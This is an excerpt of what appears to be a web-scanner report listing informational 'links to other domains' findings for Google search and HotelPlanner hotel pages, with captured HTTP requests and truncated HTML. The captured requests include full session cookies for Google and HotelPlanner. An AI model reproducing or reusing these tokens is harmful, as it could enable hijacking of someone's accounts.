<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:7QoQ-fsWdaUJ:groups.airporthotelguide.com/GroupForm.cfm+.hotelplanner.com&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','11','','0CIEBECAwCg')">Cached</a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=jOcvNV-xR90" class=l onmousedown="return clk(this,this.href,'','10153135791215298525','','12','','0CIUBELcCMAs')"><em>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=OWJhdsZJiyI" class=l onmousedown="return clk(this,this.href,'','4134974570640280354','','13','','0CIsBELcCMAw')"><em>
...[SNIP]...
<h3 class="r"><a href="https://market.android.com/developer?pub=HotelPlanner.com" class=l onmousedown="return clk(this,this.href,'','','','14','','0CJMBEBYwDQ')">Apps by <em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:ujjqJaXtWbMJ:https://market.android.com/developer%3Fpub%3DHotelPlanner.com+.hotelplanner.com&amp;cd=14&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:ujjqJaXtWbMJ:https://market.android.com/developer%3Fpub%3DHotelPlanner.com+.hotelplanner.com&cd=14&hl=en&ct=clnk&gl=us','','','','14','','0CJUBECAwDQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.retailmenot.com/view/hotelplanner.com" class=l onmousedown="return clk(this,this.href,'','','','15','','0CJkBEBYwDg')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.prnewswire.com/news-releases/hotelplannercom-is-proud-to-announce-the-addition-of-doug-robinson-as-their-new-regional-director-of-product-in-the-new-england-states-128829198.html" class=l onmousedown="return clk(this,this.href,'','','','16','','0CJ8BEBYwDw')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:l3fqC6qZdpAJ:www.prnewswire.com/news-releases/hotelplannercom-is-proud-to-announce-the-addition-of-doug-robinson-as-their-new-regional-director-of-product-in-the-new-england-states-128829198.html+.hotelplanner.com&amp;cd=16&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','16','','0CKEBECAwDw')">Cached</a>
...[SNIP]...
<div><a href="http://www.groople.com/" class=l onmousedown="return clk(this,this.href,'','','','17','','0CKYBEKIIMBA')">Groople</a>
...[SNIP]...
<div><a href="http://www.grouptraveldirectory.com/" class=l onmousedown="return clk(this,this.href,'','','','18','','0CKgBEKIIMBE')">Add to Trip Ideas</a>
...[SNIP]...
<div><a href="http://www.ichotelsgroup.com/" class=l onmousedown="return clk(this,this.href,'','','','19','','0CKoBEKIIMBI')">InterContinental Hotels Group</a>
...[SNIP]...
<div><a href="http://www.grouptravel.com/" class=l onmousedown="return clk(this,this.href,'','','','20','','0CKwBEKIIMBM')">Group Travel</a>
...[SNIP]...
19.195. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?gcx=c&sourceid=chrome&ie=UTF-8&q=sabre+travel HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=F8u0EXbNU4KGhvc02SYfdp-DEFElXzMn6jXCTpOMvEOJYkdCLz3OJlTrIyDS_Aq137v2MBKPkV6-2QEY3WGlenJjN02KGhLt0GGahhHj45EKWRTWFnwTHKW2IIFkuGEp; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjXmxcb1SChjECiXSjEaqO-DnawkdCeNdpQ1eq5H7VQaB1TYoVNaHivfCOnRdR3nNOQ08CAf6CRApbTves9jTDvA3EsEz817LyYCYCbZsTHriQICDzjjFZGK6LqC9xB10_TSh1omi0Cz3S6WTEQKI4YWzinp7wd_vo_RGZ0Q7Pmh8a7ryXTtM1Q9zJgPjGhZAWlQtcmVUtvW6l7weDo9XnzQ4xsrHMoS73ySwvooWqNnqucKMrgZgH8M9keX_Pz9mAcFTAqTRl1KdCO3svISfz05dJpITuMlwLigsrRt_DeV0

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:50 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/sXoKgwNA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 119232

<!doctype html> <head> <title>sabre travel - Google Search</title> <script>window.google={kEI:"mvyIToKwK-vViAKS4LWcDA",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?gcx=c&q=sabre+travel&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.sabretravelnetwork.com/" class=l onmousedown="return clk(this,this.href,'','','','1','','0CD0QFjAA')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:C0jdpcu8rrkJ:www.sabretravelnetwork.com/+sabre+travel&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','1','','0CD8QIDAA')">Cached</a>
...[SNIP]...
<div class=osl><a href="http://www.sabretravelnetwork.com/home/products_services/travel_agency/" onmousedown="return clk(this,this.href,'','','','1','','0CEEQ0gIoADAA')">Agencies</a> - <a href="http://en.eu.sabretravelnetwork.com/" onmousedown="return clk(this,this.href,'','','','1','','0CEIQ0gIoATAA')">Sabre Travel Network - Home</a> - <a href="http://www.sabretravelnetwork.com/home/products_services" onmousedown="return clk(this,this.href,'','','','1','','0CEMQ0gIoAjAA')">Products services</a> - <a href="http://www.sabretravelnetwork.com/home/news_events/" onmousedown="return clk(this,this.href,'','','','1','','0CEQQ0gIoAzAA')">News &amp; Events</a>
...[SNIP]...
<h3 class="r"><a href="http://en.eu.sabretravelnetwork.com/" class=l onmousedown="return clk(this,this.href,'','','','2','','0CEkQFjAB')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:4MbH0YuIU1AJ:en.eu.sabretravelnetwork.com/+sabre+travel&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','2','','0CEsQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.sabretravelnetwork.com/home/about/" class=l onmousedown="return clk(this,this.href,'','','','3','','0CFAQFjAC')">About Us | <em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:HEPdMT7qgnUJ:www.sabretravelnetwork.com/home/about/+sabre+travel&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','3','','0CFIQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.virtuallythere.com/" class=l onmousedown="return clk(this,this.href,'','','','4','','0CFkQFjAD')">Virtually There - your <em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:e7rcZ0whvZUJ:www.virtuallythere.com/+sabre+travel&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','4','','0CFsQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.sabre.com/" class=l onmousedown="return clk(this,this.href,'','','','5','','0CGAQFjAE')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:mh3ZzgVhDgUJ:www.sabre.com/+sabre+travel&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','5','','0CGIQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Sabre_Travel_Network" class=l onmousedown="return clk(this,this.href,'','','','6','','0CGcQFjAF')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:bXNodkTu-u0J:en.wikipedia.org/wiki/Sabre_Travel_Network+sabre+travel&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','6','','0CGkQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://sabre-holdings.com/ourBrands/travelNetwork.html" class=l onmousedown="return clk(this,this.href,'','','','7','','0CG4QFjAG')">Sabre Holdings :: <em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:XyuPznqHAMIJ:sabre-holdings.com/ourBrands/travelNetwork.html+sabre+travel&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','7','','0CHAQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.sabrepacific.com.au/" class=l onmousedown="return clk(this,this.href,'','','','8','','0CHQQFjAH')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:FVnxCxo34dQJ:www.sabrepacific.com.au/+sabre+travel&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','8','','0CHYQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.searchenginejournal.com/sabre-travel-network-versus-travelport-social/28616/" class=l onmousedown="return clk(this,this.href,'','','','9','','0CHsQFjAI')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:wnv03zeGa04J:www.searchenginejournal.com/sabre-travel-network-versus-travelport-social/28616/+sabre+travel&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','9','','0CH0QIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://sabrehotelrfp.net/" class=l onmousedown="return clk(this,this.href,'','','','10','','0CIEBEBYwCQ')"><em>
...[SNIP]...
<span class=vshid><a href="http://webcache.googleusercontent.com/search?q=cache:dhIqhnI6gNYJ:sabrehotelrfp.net/+sabre+travel&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','10','','0CIMBECAwCQ')">Cached</a>
...[SNIP]...
<span class=tl><a href="http://jobs.travelweekly.co.uk/job/48299/sabre-business-travel-consultants-needed-/?TrackID=1&amp;deviceType=Desktop" class=l onmousedown="return clk(this,this.href,'','','','11','','0CIcBEKkCMAo')"><em>
...[SNIP]...
<span class=tl><a href="http://www.bradenton.com/2011/09/30/3536810/thetrainlinecom-announces-new.html" class=l onmousedown="return clk(this,this.href,'','','','12','','0CI0BEKkCMAs')">thetrainline.com Announces New Agreement With <em>
...[SNIP]...
<span class=tl><a href="http://www.businessweek.com/news/2011-09-27/sabre-asks-court-to-toss-american-airlines-antitrust-claim.html" class=l onmousedown="return clk(this,this.href,'','','','13','','0CJIBEKkCMAw')"><em>
...[SNIP]...
19.196. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:29:43 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 229491

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Hotel Availability - Millennium Bostonian Hotel Boston</title>
       <meta http-equiv="Content-Type" content="t
...[SNIP]...
</script>
       <script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</script>
   
<script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?v=3&sensor=false&language=en"></script>
...[SNIP]...
</a>&nbsp;&nbsp;<a href="http://maps.google.com/maps?f=d&hl=en&geocode=&saddr=&daddr=26%20North%20St%2C%20Boston%2C%20MA%2002109&ie=UTF8&z=16" target="_blank"><strong>
...[SNIP]...
<td colspan="2">
           
               <img src="http://images.travelnow.com/hotelimages/s/010000/010158A.jpg" border="0" align="right" width="374" height="288" vspace="5" hspace="5" alt="Millennium Bostonian Hotel Boston">
           <p>
...[SNIP]...
<a href="javascript:ShowPhoto(0);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotelimages/s/010000/010158A-thumb.jpg" border="2" width="64" height="64" hspace="5" alt="Exterior"></a>
           
           <a href="javascript:ShowPhoto(1);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotelimages/s/010000/010158B-thumb.jpg" border="2" width="64" height="64" hspace="5" alt="Lobby"></a>
           
           <a href="javascript:ShowPhoto(2);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotelimages/s/010000/010158C-thumb.jpg" border="2" width="64" height="64" hspace="5" alt="Guestroom"></a>
           
           <a href="javascript:ShowPhoto(3);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotelimages/s/010000/010158D-thumb.jpg" border="2" width="64" height="64" hspace="5" alt="Recreation"></a>
           
           <a href="javascript:ShowPhoto(4);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotelimages/s/010000/010158E-thumb.jpg" border="2" width="64" height="64" hspace="5" alt="Choice1"></a>
           
           <a href="javascript:ShowPhoto(5);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotelimages/s/010000/010158F-thumb.jpg" border="2" width="64" height="64" hspace="5" alt="Choice2"></a>
           
           <a href="javascript:ShowPhoto(6);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_26_t.jpg" border="2" width="64" height="64" hspace="5" alt="Lobby"></a>
           
           <a href="javascript:ShowPhoto(7);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_27_t.jpg" border="2" width="64" height="64" hspace="5" alt="Fitness and Wellness"></a>
           
           <a href="javascript:ShowPhoto(8);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_28_t.jpg" border="2" width="64" height="64" hspace="5" alt="Fitness and Wellness"></a>
...[SNIP]...
<a href="javascript:ShowPhoto(9);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_29_t.jpg" border="2" width="64" height="64" hspace="5" alt="Guest Room"></a>
           
           <a href="javascript:ShowPhoto(10);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_31_t.jpg" border="2" width="64" height="64" hspace="5" alt="Guest Room"></a>
           
           <a href="javascript:ShowPhoto(11);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_32_t.jpg" border="2" width="64" height="64" hspace="5" alt="Lobby"></a>
           
           <a href="javascript:ShowPhoto(12);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_33_t.jpg" border="2" width="64" height="64" hspace="5" alt="Restaurant"></a>
           
           <a href="javascript:ShowPhoto(13);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_34_t.jpg" border="2" width="64" height="64" hspace="5" alt="Restaurant"></a>
           
           <a href="javascript:ShowPhoto(14);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_36_t.jpg" border="2" width="64" height="64" hspace="5" alt="Dining"></a>
           
           <a href="javascript:ShowPhoto(15);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_37_t.jpg" border="2" width="64" height="64" hspace="5" alt="Dining"></a>
           
           <a href="javascript:ShowPhoto(16);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_38_t.jpg" border="2" width="64" height="64" hspace="5" alt="Interior"></a>
           
           <a href="javascript:ShowPhoto(17);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_39_t.jpg" border="2" width="64" height="64" hspace="5" alt="Living Area"></a>
...[SNIP]...
<a href="javascript:ShowPhoto(18);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_40_t.jpg" border="2" width="64" height="64" hspace="5" alt="Guest Room"></a>
           
           <a href="javascript:ShowPhoto(19);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_41_t.jpg" border="2" width="64" height="64" hspace="5" alt="Dining"></a>
           
           <a href="javascript:ShowPhoto(20);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_42_t.jpg" border="2" width="64" height="64" hspace="5" alt="Exterior"></a>
           
           <a href="javascript:ShowPhoto(21);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_43_t.jpg" border="2" width="64" height="64" hspace="5" alt="Guest Room"></a>
           
           <a href="javascript:ShowPhoto(22);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_44_t.jpg" border="2" width="64" height="64" hspace="5" alt="Interior"></a>
           
           <a href="javascript:ShowPhoto(23);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_45_t.jpg" border="2" width="64" height="64" hspace="5" alt="Dining"></a>
           
           <a href="javascript:ShowPhoto(24);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_46_t.jpg" border="2" width="64" height="64" hspace="5" alt="Dining"></a>
           
           <a href="javascript:ShowPhoto(25);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_47_t.jpg" border="2" width="64" height="64" hspace="5" alt="Ballroom/Banquet"></a>
           
           <a href="javascript:ShowPhoto(26);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_48_t.jpg" border="2" width="64" height="64" hspace="5" alt="Business Center"></a>
...[SNIP]...
<a href="javascript:ShowPhoto(27);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_49_t.jpg" border="2" width="64" height="64" hspace="5" alt="Dining"></a>
           
           <a href="javascript:ShowPhoto(28);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_50_t.jpg" border="2" width="64" height="64" hspace="5" alt="Meeting Facility"></a>
           
           <a href="javascript:ShowPhoto(29);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_51_t.jpg" border="2" width="64" height="64" hspace="5" alt="Bath"></a>
           
           <a href="javascript:ShowPhoto(30);switchDisplay('ImageViewer','block');">
           <img src="http://images.travelnow.com/hotels/1000000/20000/15200/15159/15159_53_t.jpg" border="2" width="64" height="64" hspace="5" alt="Lounge/Bar"></a>
...[SNIP]...
</a>&nbsp;-&nbsp;<a href="http://maps.google.com/maps?f=d&hl=en&geocode=&saddr=&daddr=26%20North%20St%2C%20Boston%2C%20MA%2002109&ie=UTF8&z=16" target="_blank">Driving Directions</a>
...[SNIP]...
<td align="right" valign="top">
                   <img src="http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/4.0-11539-1.gif" alt="" border="0"><br>
...[SNIP]...
<td><img src="http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/3.0-11539-1.gif" alt="User rating of 3 on a scale of 1-5" width="118" height="20" border="0">&nbsp;&nbsp;<strong>
...[SNIP]...
<td><img src="http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/4.0-11539-1.gif" alt="User rating of 4 on a scale of 1-5" width="118" height="20" border="0">&nbsp;&nbsp;<strong>
...[SNIP]...
<td><img src="http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/4.0-11539-1.gif" alt="User rating of 4 on a scale of 1-5" width="118" height="20" border="0">&nbsp;&nbsp;<strong>
...[SNIP]...
<td><img src="http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/4.0-11539-1.gif" alt="User rating of 4 on a scale of 1-5" width="118" height="20" border="0">&nbsp;&nbsp;<strong>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<td align="center" WIDTH="135" rowspan="2">
               
                   <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fhotelplanner&amp;layout=button_count&amp;show_faces=false&amp;width=46&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:46px; height:21px;" allowTransparency="true"></iframe> <a href="http://www.facebook.com/hotelplanner?v=app_6009294086" target="_blank"><img src="//cdn.hotelplanner.com/Common/Images/FacebookSmall.gif" hspace="2" alt="" border="0"></a>
                   <a href="http://twitter.com/hotelplanner" target="_blank"><img src="//cdn.hotelplanner.com/Common/Images/TwitterSmall.gif" alt="" border="0"></a>
                   <a href="http://www.youtube.com/user/HotelPlanner30" target="_blank"><img src="//cdn.hotelplanner.com/Common/Images/YouTubeSmall.gif" alt="" border="0">
...[SNIP]...
<br>
                   <a href="http://itunes.apple.com/us/app/hotel-planner-hotel-deals/id420759661?mt=8" target="_blank"><img src="//cdn.hotelplanner.com/Common/Images/Iphone-HotelPlanner.gif" alt="Hotel Planner iPhone App" style="margin-top:6px;" border="0"></a><a href="https://market.android.com/details?id=com.hotelplanner.activity" target="_blank"><img src="//cdn.hotelplanner.com/Common/Images/Android-HotelPlanner.gif" alt="Hotel Planner Android App" style="margin-top:6px;" border="0">
...[SNIP]...
19.197. http://www.hotelplanner.com/Search/Index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:10:06 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:10:06 GMT;path=/
Vary: Accept-Encoding
Content-Length: 225194


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
</script>
       <script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/010000/010158A-thumb.jpg" width="64" height="64" border="1" alt="Millennium Bostonian Hotel Boston" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=109368&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/004000/004810A-thumb.jpg" width="64" height="64" border="1" alt="Boston Omni Parker House Hotel" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=148554&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/044000/044777A-thumb.jpg" width="64" height="64" border="1" alt="Hilton Boston Downtown / Financial District" hspace="2" vspace="2"></a>
...[SNIP]...
<a href="/Hotel/HotelRoomTypes.cfm?hotelID=106118&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c63ab795-ade8-4657-b332-8ba965b0f472"><img src="http://images.travelnow.com/hotelimages/s/001000/001013A-thumb.jpg" width="64" height="64" border="1" alt="Boston Marriott Long Wharf" hspace="2" vspace="2"></a>
...[SNIP]...
